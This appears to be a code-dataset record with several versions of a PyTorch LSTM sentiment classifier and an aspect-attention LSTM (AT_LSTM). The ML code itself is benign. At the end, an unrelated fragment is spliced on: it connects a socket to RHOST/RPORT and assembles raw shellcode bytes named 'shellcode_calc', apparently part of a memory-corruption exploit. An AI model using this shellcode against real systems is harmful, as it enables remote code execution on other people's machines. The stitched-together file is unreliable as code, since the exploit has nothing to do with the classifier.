self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, text, text_lengths=None):
text = text.view(text.size()[1], -1)
embedded = self.embedding(text.long())
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
if self.bidirectional:
hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)
dense_outputs = self.fc(hidden)
outputs = self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
from custom_layers import custom_word_embedding
from custom_layers import Attention
from utils import load_emb_weights
import torch
from torch import nn
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, text, text_lengths=None):
text = text.view(text.size()[1], -1)
embedded = self.embedding(text.long())
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
if self.bidirectional:
hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)
dense_outputs = self.fc(hidden)
outputs = self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
from custom_layers import custom_word_embedding
from custom_layers import Attention
from utils import load_emb_weights
import torch
from torch import nn
class classifier(nn.Module):
#define all the layers used in model
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,
bidirectional=False, glove=True, init=True, dropout=0):
#Constructor
super().__init__()
self.bidirectional = bidirectional
if glove:
# Embedding layer using GloVe
self.embedding = custom_word_embedding(embed_weights)
else:
# Embedding layer without GloVe
self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])
# LSTM layer and initialization
self.lstm = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
# Dense layer with initialization
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
#activation function
#self.act = nn.Sigmoid()
self.act = nn.Softmax(dim = 1)
def forward(self, text, text_lengths=None):
#text = [batch size,sent_length]
text = text.view(text.size()[1], -1) # Remove the useless 1st axis
embedded = self.embedding(text.long())
#embedded = [batch size, sent_len, emb dim]
embedded = embedded.float().cuda()
#packed sequence
#packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)
#si = embedded.size()
#embedded = embedded.view(si[1],si[2],si[3])
packed_output, (hidden, cell) = self.lstm(embedded)
#hidden = [batch size, num layers * num directions,hid dim]
#cell = [batch size, num layers * num directions,hid dim]
#concat the final forward and backward hidden state
if self.bidirectional:
hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)
#hidden = [batch size, hid dim * num directions]
dense_outputs=self.fc(hidden)
#Final activation function
outputs=self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
#define all the layers used in model
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
#Constructor
super().__init__()
# ATAE ?
self.ae = ae
self.at = at
self.embedding_dim= embedding_dim
# Embedding layer using GloVe or fasttext
self.embedding = custom_word_embedding(embed_weights)
# Embedding layer using Glove for aspects
self.aspects_embedding = custom_word_embedding(embed_weights)
# Embedding layer without GloVe
# self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])
# LSTM layer and initialization
if self.ae:
self.lstm = nn.LSTM(embedding_dim*2,
hidden_dim,
num_layers=n_layers,
bidirectional=False,
dropout=dropout,
batch_first=True)
else:
self.lstm = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=False,
dropout=dropout,
batch_first=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
# Attention layer with initialization
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
# Final dense layer with initialization
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
#activation function
#self.act = nn.Sigmoid()
self.act = nn.Softmax(dim = 1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis
#text = [batch_size, sent_length]
categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]
embedded = self.embedding(text.long())
# ATAE
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
#packed sequence
#packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)
#si = embedded.size()
#embedded = embedded.view(si[1],si[2],si[3])
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
#packed_output = [batch_size, sent_length, hid_dim]
#hidden = [batch size, num layers * num directions,hid dim]
#cell = [batch size, num layers * num directions,hid dim]
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
#embedded_aspects = [batch_size, aspect_embedding_dim]
if self.at:
final_hidden = self.attention(embedded, embedded_aspects, packed_output)
else:
final_hidden = hidden
#hidden = [batch size, hid dim * num directions]
dense_outputs=self.fc(final_hidden)
#Final activation function
outputs=self.act(dense_outputs)
return outputs
|
flexible
|
{
"blob_id": "4692b2d19f64b3b4bd10c5eadd22a4b5a2f2ef37",
"index": 3923,
"step-1": "<mask token>\n\n\nclass classifier(nn.Module):\n <mask token>\n <mask token>\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-2": "<mask token>\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n <mask token>\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-3": "<mask token>\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, text, text_lengths=None):\n text = text.view(text.size()[1], -1)\n embedded = self.embedding(text.long())\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n if self.bidirectional:\n hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)\n dense_outputs = self.fc(hidden)\n outputs = self.act(dense_outputs)\n return outputs\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-4": "from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\n\nclass classifier(nn.Module):\n\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,\n embed_weights, bidirectional=False, glove=True, init=True, dropout=0):\n super().__init__()\n self.bidirectional = bidirectional\n if glove:\n self.embedding = custom_word_embedding(embed_weights)\n else:\n self.embedding = nn.Embedding(embed_weights.shape[0],\n embed_weights.shape[1])\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,\n bidirectional=bidirectional, dropout=dropout, batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, text, text_lengths=None):\n text = text.view(text.size()[1], -1)\n embedded = self.embedding(text.long())\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n if self.bidirectional:\n hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)\n dense_outputs = self.fc(hidden)\n outputs = self.act(dense_outputs)\n return outputs\n\n\nclass AT_LSTM(nn.Module):\n\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n super().__init__()\n self.ae = ae\n self.at = at\n self.embedding_dim = embedding_dim\n self.embedding = custom_word_embedding(embed_weights)\n self.aspects_embedding = custom_word_embedding(embed_weights)\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n else:\n self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=\n n_layers, bidirectional=False, dropout=dropout, batch_first\n =True)\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n self.act = nn.Softmax(dim=1)\n\n def forward(self, inp, text_lengths=None):\n text = inp[0].view(inp[0].size()[1], -1)\n categories = inp[1].view(inp[1].size()[1]).long()\n embedded = self.embedding(text.long())\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(\n embedded_input_aspect.size()[0], 1, self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,\n embedded.size()[1], 1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n embedded = embedded.float().cuda()\n packed_output, (hidden, cell) = self.lstm(embedded)\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects,\n packed_output)\n else:\n final_hidden = hidden\n dense_outputs = self.fc(final_hidden)\n outputs = self.act(dense_outputs)\n return outputs\n",
"step-5": "from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\nclass classifier(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,\n bidirectional=False, glove=True, init=True, dropout=0):\n\n #Constructor\n super().__init__()\n self.bidirectional = bidirectional\n\n if glove:\n # Embedding layer using GloVe\n self.embedding = custom_word_embedding(embed_weights)\n else:\n # Embedding layer without GloVe\n self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])\n\n # LSTM layer and initialization\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=dropout,\n batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Dense layer with initialization\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, text, text_lengths=None):\n #text = [batch size,sent_length]\n text = text.view(text.size()[1], -1) # Remove the useless 1st axis\n embedded = self.embedding(text.long())\n #embedded = [batch size, sent_len, emb dim]\n embedded = embedded.float().cuda()\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n packed_output, (hidden, cell) = self.lstm(embedded)\n\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n\n #concat the final forward and backward hidden state\n if self.bidirectional:\n hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)\n\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n\n\n\nclass AT_LSTM(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n\n #Constructor\n super().__init__()\n # ATAE ?\n self.ae = ae\n self.at = at\n self.embedding_dim= embedding_dim\n # Embedding layer using GloVe or fasttext\n self.embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer using Glove for aspects\n self.aspects_embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer without GloVe\n # self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])\n\n # LSTM layer and initialization\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim*2,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n else:\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Attention layer with initialization\n if self.at:\n self.attention = Attention(aspect_embedding_dim, 
hidden_dim)\n self.attention.xavier_init()\n\n # Final dense layer with initialization\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, inp, text_lengths=None):\n\n text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis\n #text = [batch_size, sent_length]\n categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]\n\n embedded = self.embedding(text.long())\n\n # ATAE\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n embedded = embedded.float().cuda()\n\n packed_output, (hidden, cell) = self.lstm(embedded)\n #packed_output = [batch_size, sent_length, hid_dim]\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n #embedded_aspects = [batch_size, aspect_embedding_dim]\n\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects, packed_output)\n else:\n final_hidden = hidden\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(final_hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
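A minimal usage sketch for the AT_LSTM record above, not part of the original source. The at/ae flags mirror the AT-LSTM vs. ATAE-LSTM variants (attention over the hidden states vs. additionally concatenating the aspect embedding onto every token embedding). Assumptions, all hypothetical: custom_word_embedding accepts a [vocab, dim] weight matrix, hidden_dim is set equal to embedding_dim because the final nn.Linear(embedding_dim, output_dim) requires it, the exact attention output shape depends on the project-local Attention class, and a CUDA device is present because forward() calls .cuda() unconditionally.

import torch

# Hypothetical sizes: vocabulary of 1000 tokens, 300-d vectors, 3 polarity classes.
embed_weights = torch.randn(1000, 300)
model = AT_LSTM(embedding_dim=300, aspect_embedding_dim=300, hidden_dim=300,
                output_dim=3, n_layers=1, embed_weights=embed_weights).cuda()

# forward() strips a leading singleton axis from both inputs, hence the extra
# first dimension on the random ids below.
text = torch.randint(0, 1000, (1, 8, 20))   # [1, batch=8, seq_len=20] token ids
aspects = torch.randint(0, 1000, (1, 8))    # [1, batch=8] aspect-category ids
probs = model((text, aspects))              # softmax scores, one row per sample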
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s.connect((RHOST, RPORT))
<|reserved_special_token_0|>
shellcode_calc += b'\xba\xd5\x90\xd2}\xdb\xd5\xd9t$'
shellcode_calc += b'\xf4X1\xc9\xb161P\x13\x83'
shellcode_calc += b"\xe8\xfc\x03P\xdar'\x81\x0c\xf0"
shellcode_calc += b'\xc8z\xcc\x95A\x9f\xfd\x956\xeb'
shellcode_calc += b'\xad%<\xb9A\xcd\x10*\xd2\xa3'
shellcode_calc += b'\xbc]S\t\x9bPd"\xdf\xf3'
shellcode_calc += b'\xe69\x0c\xd4\xd7\xf1A\x15\x10\xef'
